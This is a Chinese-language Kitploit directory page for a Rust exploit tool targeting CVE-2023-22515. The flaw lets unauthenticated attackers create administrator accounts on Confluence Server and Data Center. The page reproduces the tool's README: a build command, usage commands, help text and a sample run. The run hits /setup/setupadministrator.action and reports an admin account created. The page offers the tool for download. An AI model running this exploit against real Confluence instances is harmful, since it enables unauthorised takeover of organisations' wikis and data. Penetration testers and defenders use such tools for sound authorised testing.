Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-22515-joaoviictorti — 基于 Rust 的 CVE-2023-22515 漏洞利用工具,通过失效的访问控制机制在 Confluence Server 和 Data Center 中创建未授权管理员账户。 | Kitploit
工具/GitHubGitHub/killvxk/cve-2023-22515-joaoviictorti
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubkillvxk/cve-2023-22515-joaoviictorti

CVE-2023-22515-joaoviictorti

基于 Rust 的 CVE-2023-22515 漏洞利用工具,通过失效的访问控制机制在 Confluence Server 和 Data Center 中创建未授权管理员账户。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-22515

  • 概述
  • 编译
  • 使用方法
  • 运行 CVE-2023-22515

概述

Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业维基系统。 Atlassian 已获悉部分客户报告的问题,外部攻击者可能利用公开可访问的 Confluence Server 和 Data Center 实例中先前未知的漏洞,创建未经授权的 Confluence 管理员账户并访问 Confluence 实例。

该漏洞已被归类为 CVE-2023-22515

编译

首先使用以下命令进行编译:

root@kitploit:~
cargo build --release

使用方法

您可以通过以下两种方式执行:

root@kitploit:~
cargo run -- --target http://localhost --username "teste" --password "teste" 
root@kitploit:~
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"

这将显示工具的帮助信息。以下是它支持的所有参数:

root@kitploit:~
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

运行 CVE-2023-22515

root@kitploit:~
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
下载工具